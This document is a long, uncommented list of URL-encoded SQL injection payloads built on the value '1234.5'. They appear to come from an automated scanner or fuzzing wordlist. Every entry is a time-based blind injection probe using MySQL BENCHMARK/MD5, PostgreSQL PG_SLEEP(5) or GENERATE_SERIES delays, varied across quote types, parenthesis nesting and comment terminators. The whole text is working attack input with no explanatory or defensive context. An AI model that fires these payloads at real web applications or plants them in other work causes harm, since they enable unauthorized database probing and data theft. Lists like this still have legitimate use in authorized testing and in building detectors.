1234.5%27%20%7C%7C%20%28SELECT%206765%20FROM%20DUAL%20WHERE%204367%3D4367%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201116%20WHERE%202819%3D2819%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208007%20FROM%20DUAL%20WHERE%205233%3D5233%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20%29 1234.5%20%2B%20%28SELECT%207610%20WHERE%205530%3D5530%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27XFMT%27%20FROM%20DUAL%20WHERE%208762%3D8762%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27oRjY%27%20WHERE%209621%3D9621%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%205258%3DBENCHMARK%285000000%2CMD5%280x47536c7a%29%29%20%23 1234.5%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23 1234.5%27%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23 1234.5%27%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23 1234.5%22%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23 1234.5%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%283433%3D3433 1234.5%29%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%283693%3D3693 1234.5%29%29%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%28%286821%3D6821 1234.5%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23 1234.5%27%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%27lpUR%27%3D%27lpUR 1234.5%27%29%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%28%27jiyL%27%3D%27jiyL 1234.5%27%29%29%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%28%28%27Lpba%27%3D%27Lpba 1234.5%27%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%27NVTZ%27%3D%27NVTZ 1234.5%27%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%27lmtD%27%20LIKE%20%27lmtD 1234.5%27%29%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%28%27tdST%27%20LIKE%20%27tdST 1234.5%27%29%29%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%28%28%27hDOZ%27%20LIKE%20%27hDOZ 1234.5%27%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%27iKvw%27%20LIKE%20%27iKvw 1234.5%22%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%22eOmA%22%3D%22eOmA 1234.5%22%29%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%28%22lzXB%22%3D%22lzXB 1234.5%22%29%29%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%28%28%22ETCP%22%3D%22ETCP 1234.5%22%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%22vZdt%22%3D%22vZdt 1234.5%22%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%22csgh%22%20LIKE%20%22csgh 1234.5%22%29%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%28%22PFqr%22%20LIKE%20%22PFqr 1234.5%22%29%29%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%28%28%28%22SIft%22%20LIKE%20%22SIft 1234.5%22%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20AND%20%22bRuZ%22%20LIKE%20%22bRuZ 1234.5%29%20WHERE%208562%3D8562%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23 1234.5%27%29%20WHERE%208853%3D8853%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23 1234.5%27%20WHERE%207780%3D7780%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23 1234.5%22%20WHERE%204409%3D4409%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23 1234.5%27%20%7C%7C%20%28SELECT%204913%20FROM%20DUAL%20WHERE%202046%3D2046%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207838%20WHERE%202694%3D2694%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%201435%20FROM%20DUAL%20WHERE%205430%3D5430%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20%29 1234.5%20%2B%20%28SELECT%209656%20WHERE%208065%3D8065%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20%29 1234.5%27%20%2B%20%28SELECT%20%27eNCK%27%20FROM%20DUAL%20WHERE%201133%3D1133%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27fvLc%27%20WHERE%201220%3D1220%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%206209%3DBENCHMARK%285000000%2CMD5%280x7a4a7654%29%29%23%20%23 1234.5%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29 1234.5%27%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29 1234.5%27%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29 1234.5%22%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29 1234.5%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%283901%3D3901 1234.5%29%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%289966%3D9966 1234.5%29%29%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%289915%3D9915 1234.5%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29 1234.5%27%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27ReDI%27%3D%27ReDI 1234.5%27%29%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27rVxD%27%3D%27rVxD 1234.5%27%29%29%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27pyuQ%27%3D%27pyuQ 1234.5%27%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%27avgz%27%3D%27avgz 1234.5%27%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27QcCc%27%20LIKE%20%27QcCc 1234.5%27%29%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27Scwa%27%20LIKE%20%27Scwa 1234.5%27%29%29%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27IXIK%27%20LIKE%20%27IXIK 1234.5%27%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%27iLzK%27%20LIKE%20%27iLzK 1234.5%22%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22OvkX%22%3D%22OvkX 1234.5%22%29%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22dfVu%22%3D%22dfVu 1234.5%22%29%29%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22gjfA%22%3D%22gjfA 1234.5%22%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%22AZVz%22%3D%22AZVz 1234.5%22%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22xNKt%22%20LIKE%20%22xNKt 1234.5%22%29%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22kfnB%22%20LIKE%20%22kfnB 1234.5%22%29%29%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22XKGU%22%20LIKE%20%22XKGU 1234.5%22%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20AND%20%22pwAC%22%20LIKE%20%22pwAC 1234.5%29%20WHERE%202084%3D2084%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29 1234.5%27%29%20WHERE%209887%3D9887%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29 1234.5%27%20WHERE%202261%3D2261%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29 1234.5%22%20WHERE%207723%3D7723%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29 1234.5%27%20%7C%7C%20%28SELECT%203116%20FROM%20DUAL%20WHERE%206656%3D6656%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201467%20WHERE%201979%3D1979%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%204327%20FROM%20DUAL%20WHERE%204233%3D4233%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20%29 1234.5%20%2B%20%28SELECT%208763%20WHERE%207575%3D7575%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27MVRw%27%20FROM%20DUAL%20WHERE%202255%3D2255%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27JosQ%27%20WHERE%207433%3D7433%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%205507%3D%28SELECT%205507%20FROM%20PG_SLEEP%285%29%29%20%23 1234.5%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29-- 1234.5%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%282419%3D2419 1234.5%29%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%283971%3D3971 1234.5%29%29%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%289934%3D9934 1234.5%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%27YrTO%27%3D%27YrTO 1234.5%27%29%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%27wZLc%27%3D%27wZLc 1234.5%27%29%29%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%27pmol%27%3D%27pmol 1234.5%27%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%27GVce%27%3D%27GVce 1234.5%27%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%27QkjU%27%20LIKE%20%27QkjU 1234.5%27%29%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%27mSjN%27%20LIKE%20%27mSjN 1234.5%27%29%29%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%27cRul%27%20LIKE%20%27cRul 1234.5%27%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%27yOWq%27%20LIKE%20%27yOWq 1234.5%22%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%22TkQN%22%3D%22TkQN 1234.5%22%29%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%22Rxuq%22%3D%22Rxuq 1234.5%22%29%29%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%22gjiZ%22%3D%22gjiZ 1234.5%22%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%22tiUG%22%3D%22tiUG 1234.5%22%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%22eGYa%22%20LIKE%20%22eGYa 1234.5%22%29%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%22XRGR%22%20LIKE%20%22XRGR 1234.5%22%29%29%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%22MYqM%22%20LIKE%20%22MYqM 1234.5%22%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20AND%20%22EzkQ%22%20LIKE%20%22EzkQ 1234.5%29%20WHERE%202193%3D2193%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%29%20WHERE%201927%3D1927%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%20WHERE%209917%3D9917%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29-- 1234.5%22%20WHERE%209463%3D9463%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29-- 1234.5%27%20%7C%7C%20%28SELECT%201203%20FROM%20DUAL%20WHERE%206793%3D6793%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208012%20WHERE%202397%3D2397%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208020%20FROM%20DUAL%20WHERE%204962%3D4962%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20%29 1234.5%20%2B%20%28SELECT%209330%20WHERE%209170%3D9170%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20%29 1234.5%27%20%2B%20%28SELECT%20%27JiEA%27%20FROM%20DUAL%20WHERE%204172%3D4172%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ftPv%27%20WHERE%206096%3D6096%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%209577%3D%28SELECT%209577%20FROM%20PG_SLEEP%285%29%29--%20%23 1234.5%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%27%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%27%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%22%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%288099%3D8099 1234.5%29%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%288709%3D8709 1234.5%29%29%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%281096%3D1096 1234.5%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%27%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27cfLN%27%3D%27cfLN 1234.5%27%29%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27NkEi%27%3D%27NkEi 1234.5%27%29%29%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27QAKR%27%3D%27QAKR 1234.5%27%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27MuKA%27%3D%27MuKA 1234.5%27%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27PoYn%27%20LIKE%20%27PoYn 1234.5%27%29%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27ImJj%27%20LIKE%20%27ImJj 1234.5%27%29%29%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27JuoN%27%20LIKE%20%27JuoN 1234.5%27%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27ufgu%27%20LIKE%20%27ufgu 1234.5%22%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22wcom%22%3D%22wcom 1234.5%22%29%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22WzXD%22%3D%22WzXD 1234.5%22%29%29%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22IYfT%22%3D%22IYfT 1234.5%22%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22TAyJ%22%3D%22TAyJ 1234.5%22%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22HLgQ%22%20LIKE%20%22HLgQ 1234.5%22%29%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22zchr%22%20LIKE%20%22zchr 1234.5%22%29%29%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22jYVh%22%20LIKE%20%22jYVh 1234.5%22%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22bLig%22%20LIKE%20%22bLig 1234.5%29%20WHERE%206630%3D6630%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%27%29%20WHERE%203590%3D3590%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%27%20WHERE%208839%3D8839%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%22%20WHERE%207096%3D7096%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1234.5%27%20%7C%7C%20%28SELECT%209845%20FROM%20DUAL%20WHERE%209559%3D9559%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201814%20WHERE%207728%3D7728%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%204816%20FROM%20DUAL%20WHERE%205280%3D5280%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29 1234.5%20%2B%20%28SELECT%202245%20WHERE%208929%3D8929%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27MPLx%27%20FROM%20DUAL%20WHERE%205796%3D5796%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27EUDw%27%20WHERE%202186%3D2186%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%202774%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%23 1234.5%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%282296%3D2296 1234.5%29%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%282116%3D2116 1234.5%29%29%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%289482%3D9482 1234.5%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%27wqki%27%3D%27wqki 1234.5%27%29%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%27yMYU%27%3D%27yMYU 1234.5%27%29%29%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%27ReSY%27%3D%27ReSY 1234.5%27%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%27XeSU%27%3D%27XeSU 1234.5%27%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%27UiZz%27%20LIKE%20%27UiZz 1234.5%27%29%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%27NpKt%27%20LIKE%20%27NpKt 1234.5%27%29%29%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%27mKtJ%27%20LIKE%20%27mKtJ 1234.5%27%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%27lJtJ%27%20LIKE%20%27lJtJ 1234.5%22%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%22MBEn%22%3D%22MBEn 1234.5%22%29%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%22KrAa%22%3D%22KrAa 1234.5%22%29%29%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%22xEYY%22%3D%22xEYY 1234.5%22%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%22Jhxy%22%3D%22Jhxy 1234.5%22%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%22NVUt%22%20LIKE%20%22NVUt 1234.5%22%29%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%22rVXN%22%20LIKE%20%22rVXN 1234.5%22%29%29%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%22bQgQ%22%20LIKE%20%22bQgQ 1234.5%22%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%22oTKs%22%20LIKE%20%22oTKs 1234.5%29%20WHERE%203285%3D3285%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%20WHERE%205569%3D5569%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%20WHERE%203538%3D3538%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%20WHERE%201530%3D1530%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%20%7C%7C%20%28SELECT%204591%20FROM%20DUAL%20WHERE%206968%3D6968%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204718%20WHERE%203018%3D3018%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207194%20FROM%20DUAL%20WHERE%202445%3D2445%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29 1234.5%20%2B%20%28SELECT%202862%20WHERE%209889%3D9889%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29 1234.5%27%20%2B%20%28SELECT%20%27WtIn%27%20FROM%20DUAL%20WHERE%206367%3D6367%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27aHvQ%27%20WHERE%202166%3D2166%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%201040%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%23 